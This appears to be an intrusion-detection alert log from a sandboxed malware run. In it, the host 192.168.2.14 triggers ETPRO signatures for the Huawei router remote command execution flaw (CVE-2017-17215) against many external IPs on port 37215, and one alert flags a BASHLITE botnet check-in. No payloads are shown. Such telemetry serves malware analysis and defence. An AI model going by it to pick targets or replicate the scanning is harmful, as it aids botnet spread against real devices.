                                            06/14/24-10:44:14.683594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862037215192.168.2.14156.13.205.191
                                            06/14/24-10:43:43.969817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839237215192.168.2.14197.214.153.224
                                            06/14/24-10:44:02.384470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402437215192.168.2.1441.111.134.21
                                            06/14/24-10:44:26.979206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375837215192.168.2.14197.188.249.94
                                            06/14/24-10:43:50.070798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688037215192.168.2.1441.14.147.23
                                            06/14/24-10:44:29.014899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556837215192.168.2.14156.128.58.209
                                            06/14/24-10:44:20.827923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709837215192.168.2.1441.236.87.5
                                            06/14/24-10:43:58.289053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605837215192.168.2.14197.243.255.132
                                            06/14/24-10:44:00.336677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661437215192.168.2.14156.102.217.231
                                            06/14/24-10:44:14.687040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098437215192.168.2.14156.180.90.14
                                            06/14/24-10:44:14.669795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430837215192.168.2.1441.209.38.196
                                            06/14/24-10:43:56.245208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5613637215192.168.2.14197.164.85.101
                                            06/14/24-10:43:52.145902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526837215192.168.2.14156.129.242.95
                                            06/14/24-10:43:37.763243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033637215192.168.2.14197.65.240.46
                                            06/14/24-10:43:48.017759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3971237215192.168.2.1441.73.188.33
                                            06/14/24-10:44:22.878734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074637215192.168.2.14156.163.15.33
                                            06/14/24-10:44:20.806950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163437215192.168.2.14197.57.222.217
                                            06/14/24-10:43:48.028050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5959837215192.168.2.14156.166.185.216
                                            06/14/24-10:44:20.804374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517837215192.168.2.14197.175.244.54
                                            06/14/24-10:43:37.759038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442237215192.168.2.14197.231.184.84
                                            06/14/24-10:44:08.519744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540037215192.168.2.1441.114.133.135
                                            06/14/24-10:43:39.813456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3902237215192.168.2.14197.131.143.27
                                            06/14/24-10:43:50.115441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317237215192.168.2.1441.123.95.20
                                            06/14/24-10:43:56.253766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189437215192.168.2.1441.149.24.255
                                            06/14/24-10:43:56.245658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261637215192.168.2.14156.186.126.21
                                            06/14/24-10:43:39.808414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675837215192.168.2.14197.128.166.29
                                            06/14/24-10:43:45.990388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595637215192.168.2.14156.6.124.50
                                            06/14/24-10:44:06.448120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278837215192.168.2.1441.248.73.205
                                            06/14/24-10:43:37.760980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685637215192.168.2.14156.210.142.71
                                            06/14/24-10:44:06.452780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752837215192.168.2.1441.211.60.2
                                            06/14/24-10:43:54.185619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781837215192.168.2.14156.19.175.54
                                            06/14/24-10:43:52.146437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687037215192.168.2.1441.38.30.70
                                            06/14/24-10:44:26.999487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369037215192.168.2.1441.110.150.90
                                            06/14/24-10:43:34.662561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895037215192.168.2.1441.73.147.202
                                            06/14/24-10:43:34.661802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939237215192.168.2.14156.70.90.47
                                            06/14/24-10:43:56.230804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639437215192.168.2.1441.42.166.253
                                            06/14/24-10:43:48.016156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718837215192.168.2.14197.114.145.138
                                            06/14/24-10:43:39.790086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461237215192.168.2.1441.78.236.244
                                            06/14/24-10:44:02.381538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5027837215192.168.2.14156.225.229.12
                                            06/14/24-10:43:37.763071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562837215192.168.2.1441.34.32.94
                                            06/14/24-10:44:29.014591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6063237215192.168.2.1441.197.213.179
                                            06/14/24-10:44:33.134889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960837215192.168.2.14156.2.167.195
                                            06/14/24-10:44:22.861620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349837215192.168.2.1441.225.130.114
                                            06/14/24-10:44:29.022097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146037215192.168.2.1441.72.254.17
                                            06/14/24-10:43:34.660480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353437215192.168.2.1441.131.181.63
                                            06/14/24-10:44:20.829170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4072637215192.168.2.14156.76.220.24
                                            06/14/24-10:44:06.471501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482837215192.168.2.14156.206.74.34
                                            06/14/24-10:44:06.453389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5330837215192.168.2.14197.245.26.198
                                            06/14/24-10:44:24.932917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446837215192.168.2.14197.117.160.163
                                            06/14/24-10:44:24.934625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5220837215192.168.2.1441.98.149.4
                                            06/14/24-10:44:26.977066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246237215192.168.2.14197.150.77.0
                                            06/14/24-10:44:31.054514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4145037215192.168.2.1441.27.84.195
                                            06/14/24-10:44:22.859414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412037215192.168.2.14197.55.5.0
                                            06/14/24-10:44:00.326155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638637215192.168.2.1441.40.18.111
                                            06/14/24-10:44:00.340988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4521037215192.168.2.14197.68.191.35
                                            06/14/24-10:43:45.968427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414437215192.168.2.14156.79.39.69
                                            06/14/24-10:44:12.641700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233437215192.168.2.1441.166.159.153
                                            06/14/24-10:44:16.715105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437637215192.168.2.1441.42.249.69
                                            06/14/24-10:44:14.668157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971637215192.168.2.14197.34.147.180
                                            06/14/24-10:44:29.027195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515437215192.168.2.14156.241.249.63
                                            06/14/24-10:43:45.967457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507837215192.168.2.1441.144.233.24
                                            06/14/24-10:44:20.806718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4513837215192.168.2.1441.237.21.62
                                            06/14/24-10:44:00.322679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586637215192.168.2.14197.166.179.201
                                            06/14/24-10:44:06.470549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916437215192.168.2.1441.151.230.223
                                            06/14/24-10:44:10.545832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812837215192.168.2.14197.50.147.188
                                            06/14/24-10:44:26.997975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370437215192.168.2.14156.121.26.112
                                            06/14/24-10:44:20.806052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984837215192.168.2.14156.98.132.190
                                            06/14/24-10:44:20.803222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567037215192.168.2.14197.12.229.84
                                            06/14/24-10:44:12.646808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974437215192.168.2.1441.220.46.203
                                            06/14/24-10:43:52.159323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378037215192.168.2.14197.124.110.24
                                            06/14/24-10:44:04.422951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879437215192.168.2.14156.247.2.59
                                            06/14/24-10:44:08.501763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451637215192.168.2.14156.185.105.116
                                            06/14/24-10:44:14.684321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4244637215192.168.2.14197.95.202.245
                                            06/14/24-10:43:45.989889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216837215192.168.2.1441.13.35.30
                                            06/14/24-10:44:18.766211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243837215192.168.2.1441.220.192.39
                                            06/14/24-10:44:00.326116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822837215192.168.2.1441.108.153.231
                                            06/14/24-10:44:04.408880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041037215192.168.2.14156.55.204.2
                                            06/14/24-10:44:22.859945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960237215192.168.2.1441.129.236.30
                                            06/14/24-10:43:37.762783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510037215192.168.2.14156.248.254.202
                                            06/14/24-10:44:18.763571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545637215192.168.2.14156.212.60.55
                                            06/14/24-10:44:10.543630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5458237215192.168.2.14197.42.107.47
                                            06/14/24-10:43:45.967834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446437215192.168.2.14156.246.202.142
                                            06/14/24-10:44:24.917274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043237215192.168.2.1441.15.95.41
                                            06/14/24-10:44:31.056548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252637215192.168.2.14156.12.137.16
                                            06/14/24-10:43:48.018780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513637215192.168.2.14197.86.124.213
                                            06/14/24-10:43:54.201072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5801437215192.168.2.14156.199.100.244
                                            06/14/24-10:44:31.054273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011837215192.168.2.14156.203.222.62
                                            06/14/24-10:44:27.001447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207237215192.168.2.14197.160.198.72
                                            06/14/24-10:43:36.718352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050637215192.168.2.14156.109.253.210
                                            06/14/24-10:44:12.645739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3328637215192.168.2.14197.65.80.44
                                            06/14/24-10:44:33.134090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4366837215192.168.2.1441.225.2.252
                                            06/14/24-10:43:54.185132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811437215192.168.2.1441.194.250.204
                                            06/14/24-10:43:36.705483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4622237215192.168.2.1441.3.97.244
                                            06/14/24-10:44:26.999768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011637215192.168.2.1441.115.140.232
                                            06/14/24-10:44:20.807018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101437215192.168.2.14197.51.93.16
                                            06/14/24-10:44:29.015199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613037215192.168.2.14156.107.192.12
                                            06/14/24-10:43:58.293187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127837215192.168.2.1441.206.86.60
                                            06/14/24-10:44:02.382493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3895037215192.168.2.14197.84.20.76
                                            06/14/24-10:44:10.564490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4884637215192.168.2.1441.136.152.74
                                            06/14/24-10:43:54.184924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309037215192.168.2.1441.243.76.131
                                            06/14/24-10:44:08.518941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4761837215192.168.2.14197.62.248.16
                                            06/14/24-10:43:45.967619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501237215192.168.2.14156.64.76.132
                                            06/14/24-10:44:22.878283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4518637215192.168.2.14197.204.74.74
                                            06/14/24-10:44:06.453310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058837215192.168.2.14156.146.106.113
                                            06/14/24-10:43:41.849282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5466637215192.168.2.14156.130.112.214
                                            06/14/24-10:44:33.132953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5484237215192.168.2.14197.133.241.146
                                            06/14/24-10:44:26.986152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578437215192.168.2.14197.61.66.137
                                            06/14/24-10:44:29.023140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331237215192.168.2.14197.125.56.57
                                            06/14/24-10:43:45.967337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006637215192.168.2.14156.105.203.157
                                            06/14/24-10:44:02.368921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870637215192.168.2.1441.113.24.181
                                            06/14/24-10:44:35.177417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4337837215192.168.2.1441.187.251.10
                                            06/14/24-10:43:58.274505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227637215192.168.2.1441.153.222.224
                                            06/14/24-10:44:18.761863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760437215192.168.2.1441.144.188.22
                                            06/14/24-10:43:34.661259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262837215192.168.2.14156.188.227.67
                                            06/14/24-10:44:22.878851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180637215192.168.2.1441.154.55.21
                                            06/14/24-10:43:50.111424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203237215192.168.2.14156.226.177.190
                                            06/14/24-10:43:48.028318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175037215192.168.2.14156.172.47.88
                                            06/14/24-10:43:54.184149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848437215192.168.2.14156.117.86.233
                                            06/14/24-10:44:04.419950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700637215192.168.2.14156.16.108.200
                                            06/14/24-10:44:04.425074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313837215192.168.2.1441.87.29.77
                                            06/14/24-10:43:54.181537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843237215192.168.2.14156.29.3.2
                                            06/14/24-10:44:00.343695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3766237215192.168.2.1441.238.91.165
                                            06/14/24-10:44:26.997077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5581837215192.168.2.14197.29.106.168
                                            06/14/24-10:43:34.661622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198037215192.168.2.1441.161.125.211
                                            06/14/24-10:43:45.966675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541437215192.168.2.14197.62.200.138
                                            06/14/24-10:44:33.148335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484437215192.168.2.14156.51.215.196
                                            06/14/24-10:44:26.980404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764437215192.168.2.14156.231.95.249
                                            06/14/24-10:43:43.972503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3378437215192.168.2.1441.197.56.56
                                            06/14/24-10:44:00.340728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223037215192.168.2.1441.34.94.242
                                            06/14/24-10:44:22.883085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285237215192.168.2.14197.45.179.90
                                            06/14/24-10:43:50.111996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3926037215192.168.2.14156.246.192.109
                                            06/14/24-10:44:33.135084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934837215192.168.2.14156.182.126.81
                                            06/14/24-10:43:41.850083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3625637215192.168.2.1441.229.65.243
                                            06/14/24-10:44:29.011485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291637215192.168.2.14156.122.88.68
                                            06/14/24-10:43:52.146906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071637215192.168.2.1441.52.2.120
                                            06/14/24-10:43:41.904919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347037215192.168.2.14197.78.73.132
                                            06/14/24-10:43:50.075270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151637215192.168.2.14197.15.19.58
                                            06/14/24-10:44:14.683103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465237215192.168.2.1441.240.20.236
                                            06/14/24-10:44:31.089992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442437215192.168.2.14156.23.16.108
                                            06/14/24-10:44:06.470662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036637215192.168.2.14156.32.102.136
                                            06/14/24-10:44:33.132407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4976037215192.168.2.14156.123.27.236
                                            06/14/24-10:43:34.663611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262037215192.168.2.14197.55.64.7
                                            06/14/24-10:44:31.052342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815637215192.168.2.14156.252.211.146
                                            06/14/24-10:43:54.185751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874637215192.168.2.14197.54.106.82
                                            06/14/24-10:44:35.181655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040437215192.168.2.14197.114.41.211
                                            06/14/24-10:43:36.703489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4771637215192.168.2.14197.108.0.223
                                            06/14/24-10:43:44.422789TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)5187823192.168.2.14101.23.0.0
                                            06/14/24-10:44:10.565938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233837215192.168.2.14197.114.55.62
                                            06/14/24-10:44:14.671114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227237215192.168.2.14156.101.129.84
                                            06/14/24-10:44:18.775984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840837215192.168.2.14156.180.222.98
                                            06/14/24-10:44:31.084813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039437215192.168.2.1441.177.55.241
                                            06/14/24-10:43:36.723990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755637215192.168.2.1441.20.95.37
                                            06/14/24-10:43:50.069811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098437215192.168.2.14197.224.229.207
                                            06/14/24-10:43:34.663546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3853637215192.168.2.14197.164.90.89
                                            06/14/24-10:43:56.244708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5911237215192.168.2.1441.54.235.177
                                            06/14/24-10:44:10.565668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577237215192.168.2.1441.220.77.251
                                            06/14/24-10:44:22.860127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579637215192.168.2.14197.4.209.32
                                            06/14/24-10:44:29.011541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472437215192.168.2.1441.137.187.36
                                            06/14/24-10:43:56.253397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951237215192.168.2.1441.57.232.200
                                            06/14/24-10:44:24.934481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810037215192.168.2.1441.137.77.38
                                            06/14/24-10:43:45.967114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788037215192.168.2.14156.38.36.137
                                            06/14/24-10:43:36.717057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3612637215192.168.2.14197.175.137.231
                                            06/14/24-10:44:14.689482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5813837215192.168.2.14197.195.212.150
                                            06/14/24-10:44:06.472806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311837215192.168.2.14197.237.161.222
                                            06/14/24-10:44:31.082357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087237215192.168.2.14197.140.127.1
                                            06/14/24-10:43:54.183821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987037215192.168.2.14156.6.82.3
                                            06/14/24-10:44:02.382793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200837215192.168.2.14197.247.222.0
                                            06/14/24-10:43:56.229219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974037215192.168.2.14156.129.223.101
                                            06/14/24-10:44:08.518638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508237215192.168.2.14197.15.251.160
                                            06/14/24-10:43:36.722087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310237215192.168.2.14156.176.170.105
                                            06/14/24-10:43:43.970709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255237215192.168.2.14156.114.231.161
                                            06/14/24-10:44:02.381260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570637215192.168.2.14197.249.103.110
                                            06/14/24-10:43:34.661612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396637215192.168.2.1441.17.142.44
                                            06/14/24-10:44:26.985698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3718837215192.168.2.14197.14.228.80
                                            06/14/24-10:43:43.968903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5308437215192.168.2.14197.83.14.13
                                            06/14/24-10:43:50.074628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751637215192.168.2.1441.117.2.45
                                            06/14/24-10:43:45.965318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883437215192.168.2.14156.183.91.115
                                            06/14/24-10:44:14.685159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619037215192.168.2.1441.16.53.126
                                            06/14/24-10:43:36.725704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362237215192.168.2.14156.125.205.77
                                            06/14/24-10:43:58.274229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886437215192.168.2.14197.249.28.65
                                            06/14/24-10:43:58.274813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041037215192.168.2.14156.69.174.125
                                            06/14/24-10:43:41.846277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204237215192.168.2.14156.211.202.95
                                            06/14/24-10:44:10.544471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963037215192.168.2.14197.201.181.9
                                            06/14/24-10:44:27.001747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4397837215192.168.2.14197.102.190.156
                                            06/14/24-10:44:04.421113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.14197.133.245.7
                                            06/14/24-10:44:16.715563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922037215192.168.2.14197.8.200.142
                                            06/14/24-10:44:22.879813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576837215192.168.2.14197.61.197.140
                                            06/14/24-10:43:54.202542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026637215192.168.2.14197.163.41.221
                                            06/14/24-10:44:24.932448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150037215192.168.2.1441.245.51.191
